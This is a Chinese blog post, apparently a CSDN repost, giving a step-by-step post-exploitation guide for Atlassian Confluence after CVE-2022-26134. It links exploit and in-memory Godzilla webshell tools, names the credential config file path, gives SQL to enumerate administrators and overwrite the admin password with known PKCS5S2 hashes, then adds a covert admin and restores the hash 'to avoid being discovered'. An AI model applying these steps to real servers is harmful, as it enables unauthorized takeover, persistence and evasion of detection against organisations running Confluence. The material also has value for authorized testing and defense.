攻防实战之Confluence后利用

最新推荐文章于 2024-04-11 16:35:10 发布
最新推荐文章于 2024-04-11 16:35:10 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: 公众号归档 攻防实战应用 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39251927/article/details/127883324
版权

漏洞验证
作者:penguin

原文地址:攻防实战之Confluence后利用

CVE-2022-26134首先验证漏洞是在的,但这并不是文章重点,也可使用脚本一键,但没必要。

项目地址:https://github.com/jbaines-r7/through_the_wire

Confluence后利用

现在的思路就是写shell获取系统权限——>再到数据库权限——>最后到管理员密码。这边管理员密码是密文加密在数据库中,解不开,因此解决的思路是将管理员用户密码修改为已知明文密码的密文(这边不能直接在数据库中添加字段,关系型数据库在单表中添加一条字段可能会出现问题),登录上后台以后,添加用户并加入管理员组,最后将管理员密码还原。

Confluence的后利用主要问题在于在Linux中搭建时,默认是Confluence用户权限,如下图所示,而confluence在linux中是没有写权限的,这也就是为什么有些人发现可以执行命令但是shell写不进去。因此处理这种问题最有效的方法就是无文件落地,写内存马。

打内存马

准备研究下Confluence内存马,但是好在已有大哥把Confluence的内存马整出来了,我这边只负责乘凉即可:

项目地址:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

连接数据库

查找数据库配置文件

Confluence数据库默认配置文件如下,若未使用默认路径,全局搜索该配置文件即可

/var/atlassian/application-data/confluence/confluence.cfg.xml

可知数据库地址:192.168.159.133:5432 username:confluence password:confluence

选择哥斯拉数据库管理模块连接postgresql数据库:

修改admin密码

先查询所有管理员用户的id值,这步的目的主要是定位管理员用户

select u.id, u.user_name, u.active from cwd_user u join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';

可知admin为管理员

查看用户密码表

SELECT * FROM "cwd_user" limit 10

其中credential字段是密码密文,解不开,按照前面的思路,我们可以将其修改为我们已知的密文,登录上以后再改回来。

先保存admin密文备用

{PKCS5S2}xcOomVKqqDnMbMMrR3YyE3cP2ihgjkBTbwkfAMz1TaO+Kjxp/p+lcB1CV5sh7pKH

修改密码

修改密码需要改用户id值和已知密文

Id:根据查表admin的id为229377

Credential:

Ab123456对应密文——

{PKCS5S2}ltrb9LlmZ0QDCJvktxd45WgYLOgPt2XTV8X7av2p0mhPvIwofs9bHYVz2OXQ6/kF

123123对应密文——

{PKCS5S2}V1J8HcMvYsdtnETu2tjA1gFVQ1L3o+dAsNiooSAcSvpRcbkTR8K4Ha/iWgF145gk

123456对应密文——

{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm

这边将密码改为123123

那么Sql语句为:

update cwd_user set credential = '{PKCS5S2}V1J8HcMvYsdtnETu2tjA1gFVQ1L3o+dAsNiooSAcSvpRcbkTR8K4Ha/iWgF145gk' where id=xxxxxx;

修改成功:

至此admin的密码被改为了123123

后续

后面紧接着就是一分钟内快速登录后台——>用户管理——>添加用户——>加管理员——>用上面方法重新将admin密码改回。速度要快动作要帅以免被发现。

自动化工具

这边推荐哥斯拉作者写的一个自动化工具,专门针对confluence后利用的,如果觉得上面手动利用麻烦的可以使用。

项目地址:https://github.com/BeichenDream/PostConfluence

下载并添加插件

功能模块如下,主要挑选三个介绍:

AddAdminUser 添加一个管理员

EnumAllUser 列举所有用户

EnumHibernateConfig 查看数据库配置文件

至此,Confluence后利用介绍完毕,有了管理员权限登录后台后,相信会给大家带来不小的惊喜,后面有时间会介绍其他后利用的姿势。

La2y
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Confluence 忘记管理员密码
Byron.Liu
07-06 6359

 1、连接数据库,运行如下sql找到管理员账户
 
 SELECT u.id, u.user_name, u.active FROM cwd_user u 
 JOIN cwd_membership m ON u.id=m.child_user_id 
 JOIN cwd_group g ON m.parent_id=g.id &#...
PKCS#5研究——第二部分 基于口令的加密方案
热门推荐
云与山的彼端
11-12 2万+
6. 基于口令的加密方案 有两个基于口令的加密PBES方案,如下表。 表5.1 基于口令的加密方案PBES1和PBES2对比 (hLen为HASH函数的输出长度) 项目 PBES1 PBES2 使用的PBKDF PBKDF1 PBKDF2 使用的密码算法 ...
【漏洞分析】Confluence 数据中心和服务器中的严重漏洞 CVE-2023-22515
网络安全知识分享
03-21 1264
Confluence 的开发者 Atlassian 已公告此漏洞,并将其归类为损坏的访问控制问题。他们强调需要立即采取行动,并建议用户升级到最新版本以保护他们的系统。Atlassian 将该漏洞的严重级别评定为 Critical CVSS 10。
内网服务器安 mysql+confluence 部署以及破解
最新发布
weixin_47060347的博客
04-11 636
记录一下使用Vmware安装Ubuntu,并在其中搭建mysql 5.7.30 和 confluence 6.3.1,最后移植到ESXI中运行。
【CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 7726
【CVE-2022-26134】Confluence OGNL RCE 漏洞
confluence的几个高危漏洞复现
fly夏天的博客
12-06 3719
CVE-2021-26084 CVE-2022-26134 漏洞复现
记一次攻防演练之vcenter后渗透利用
crowsec
11-16 3050
很早之前的一次攻防演练,主要是从web漏洞入手,逐渐学习vcenter后利用技术。过程由于太长,很多细节都省略了,中间踩坑、磕磕绊绊的地方太多了。。。
CVE-2022-26134 Confluence 无文件落地的内存马注入姿势
qq_40466372的博客
07-06 5515
CVE-2022-26134 Confluence 无文件落地的内存马注入
Confluence OGNL注入漏洞复现(CVE-2022-26134)
云舒的博客
07-29 1128
Confluence OGNL注入漏洞复现(CVE-2022-26134)
openssl库编译-及16进制的key转Rsa数据结构
smilestone322的专栏
05-15 2905
1. linux 下编译 源码地址为:https://www.openssl.org/source/old/;当前最新版本为 1.1.0f,https://www.openssl.org/source/old/1.1.0/openssl-1.1.0f.tar.gz 源码编译 解压之后,进入源码目录openssl-1.1.0f,执行如下命令。因为只需要编译静态库,也没有特殊要求,所以使用的编译选项配置很简单: 1 2 ./config-fPIC no-share.
PKCS5:基于密码的加密规范
Joe's Blog
03-02 3396
1、简介 基于密码的加密,涵盖以下方面: 密钥导出函数加密方案消息认证方案ASN.1语法 2、符号 KDF key derivation function PRF pseudorandom function PS padding string, an octet string 4、Salt值和迭代次数 The salt can be
confluence与jira账号对接、查看到期时间及问题总结
01-08 767
安装顺序:先安装Jira,然后安装Confluence,在Confluence安装过程中去连接jira,既Confluence用户目录会主动同步jira的用户目录。这样,在jira里创建用户就会自动同步到Confluence里,双方登陆的用户是一样的(最好是先在jira里创建用户,然后同步到Confluence里)。在同一个session环境下,可以使用同样的账号登陆jira和Confl...
Confluence OGNL 注入 (CVE-2022-26134)
weixin_47515220的博客
09-26 1792
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证的远程代码执行漏洞。OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。
微信小程序:DES3加密接口解决方案
00011011的博客
07-05 7731
DES3加密:DES3.jsvar Base64 = require(‘../utils/Base64.js’) var des3iv = ‘01234567’; /** * 3DES加密,CBC/PKCS5Padding */ function encrypt(key, input) { var genKey = genkey(key, 0, 24); retur
Confluence任意文件读取
打代码的小女孩
11-17 1934
影响系统 Atlassian Confluence 4.x 危害 远程攻击者利用漏洞上传恶意附件。 攻击所需条件 攻击者必须访问Atlassian Confluence。 漏洞信息 Atlassian Confluence(简称Confluence)是一个专业的wiki程序。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。 ...
confluence重置admin密码
02-05 7127
重置方法: 运行此sql 找到你的管理员帐户: select u.id, u.user_name, u.active from cwd_user u join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.direc
confluence修改server.xml后如何重启生效
05-30
Confluence中修改了server.xml文件后,需要重启Confluence应用程序才能使更改生效。以下是重启Confluence的步骤: 1. 停止Confluence应用程序。 2. 找到Confluence安装目录中的bin文件夹。 3. 打开命令行窗口并导航到bin目录。 4. 在命令行窗口中输入以下命令,然后按Enter键: - Windows系统:`shutdown.bat -r` - Linux或Mac系统:`./shutdown.sh -r` 5. 等待Confluence应用程序完全关闭并重新启动。 6. 验证修改是否生效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值